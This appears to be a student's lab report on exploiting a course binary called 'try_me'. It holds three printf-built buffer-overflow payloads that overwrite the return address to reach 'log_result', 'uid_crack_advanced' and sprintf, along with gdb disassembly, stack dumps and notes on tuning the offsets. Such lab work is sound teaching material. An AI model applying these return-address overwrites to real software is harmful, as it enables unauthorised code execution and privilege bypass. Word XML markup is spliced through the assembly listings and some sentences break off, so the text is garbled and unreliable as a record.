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David Huang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dhuan008@ucr.edu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1.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Exploit payload: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./try_me "$(printf "AAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x72\x8e\x04\x08")"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Documentation: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Used gdb disas to identify addresses of test and log_result. Found the address with calls test and the return value after test runs.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Dump of assembler code for function main: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0x08048f09 &lt;+0&gt;: </w:t>
        <w:tab/>
        <w:t xml:space="preserve">lea</w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x4(%esp),%ecx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0x08048f0d &lt;+4&gt;: </w:t>
        <w:tab/>
        <w:t xml:space="preserve">and</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$0xfffffff0,%esp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0x08048f10 &lt;+7&gt;: </w:t>
        <w:tab/>
        <w:t xml:space="preserve">pushl  -0x4(%ecx)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0x08048f13 &lt;+10&gt;:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">push   %ebp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0x08048f62 &lt;+89&gt;:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">push   %eax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0x08048f63 &lt;+90&gt;:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">call   0x8048e24 &lt;test&gt;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0x08048f68 &lt;+95&gt;:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">add</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$0x10,%esp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0x08048f6b &lt;+98&gt;:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">jmp</w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x8048f7d &lt;main+116&gt;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0x08048f6d &lt;+100&gt;:   sub</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$0xc,%esp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…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Estimated number of characters needed for buffer overflow based on the size of the buffer and EBP - old and added the address of log_result as the return address instead of the address after the call to log_result.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Ran in gdb and tweaked the length after looking at the stack and locating the return address.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2. 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Exploit payload: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./try_me "$(printf "ABBBBCCCCDDDDEEEEFFFFGGGG\x14\xd6\xff\xff\xa0\x8e\x04\x08\xaf\x8e\x04\x08")"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Documentation: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Continuing from part one but instead of the address for uid_crack I used the address for uid_crack_advanced. From there I noticed that it tried to access the memory right before the address+4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Breakpoint 1, log_result_advanced (code=135184128) at test.c:27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27 in test.c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(gdb) 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37 in test.c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(gdb) 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Cannot access memory at address 0x4848484c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 I changed that to be the valid address. Then the instruction pointer was pointing the value after the return address which was turned into junk.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(gdb) x/20x $sp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0xffffd600: 0x00000000 0x080ea00c 0xffffd658 0x4104f220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0xffffd610: 0x42424242 0x43434343 0x44444444 0x45454545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0xffffd620: 0x46464646 0x47474747 0xffffd614 0x08048ea0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0xffffd630: 0xffffd800 0x080ebf40 0x0000041b 0x08048f27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Program received signal SIGSEGV, Segmentation fault.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0xffffd800 in ?? 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 changed that value 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0x08048eaf &lt;+15&gt;:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">call   0x806c630 &lt;getuid&gt;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 the function log_result_advanced so that it would continue and run the function. Could have also directly jumped past the check instead of the start of the function etc.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u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit payload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  <w:t xml:space="preserve">Didn't get it working.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"$(printf "Arepus_kcarc_1501_diuGGGG\x14\xd6\xff\xff\xaf\x8e\x04\x08\x30\xf2\x04\x08AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLL")"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Documentation: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Tried to overwrite the address in log_result_advanced/sprinf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Dump of assembler code for function sprintf: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0x0804f230 &lt;+0&gt;: </w:t>
        <w:tab/>
        <w:t xml:space="preserve">sub</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$0x1c,%esp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0x0804f233 &lt;+3&gt;: </w:t>
        <w:tab/>
        <w:t xml:space="preserve">lea</w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x28(%esp),%eax </w:t>
        <w:tab/>
        <w:t xml:space="preserve">//$eax = $esp+28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0x0804f237 &lt;+7&gt;: </w:t>
        <w:tab/>
        <w:t xml:space="preserve">mov</w:t>
        <w:tab/>
        <w:t xml:space="preserve">%eax,0x8(%esp)  </w:t>
        <w:tab/>
        <w:t xml:space="preserve">//$(esp + 8) = $eax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0x0804f23b &lt;+11&gt;:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">mov</w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x24(%esp),%eax </w:t>
        <w:tab/>
        <w:t xml:space="preserve">//%eax = $esp+24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0x0804f23f &lt;+15&gt;:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">mov</w:t>
        <w:tab/>
        <w:t xml:space="preserve">%eax,0x4(%esp)  </w:t>
        <w:tab/>
        <w:t xml:space="preserve">//$(esp+4) = $eax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0x0804f243 &lt;+19&gt;:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">mov</w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x20(%esp),%eax </w:t>
        <w:tab/>
        <w:t xml:space="preserve">//$eax = esp +20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0x0804f247 &lt;+23&gt;:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">mov</w:t>
        <w:tab/>
        <w:t xml:space="preserve">%eax,(%esp)     </w:t>
        <w:tab/>
        <w:t xml:space="preserve">//esp = eax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0x0804f24a &lt;+26&gt;:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">call   0x804f910 &lt;vsprintf&gt; // call vsprintf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0x0804f24f &lt;+31&gt;:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">add</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$0x1c,%esp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0x0804f252 &lt;+34&gt;:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">ret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End of assembler dump.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with a address point to the string uid_1051_crack_super but was getting hex characters and then no output.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huan008@uc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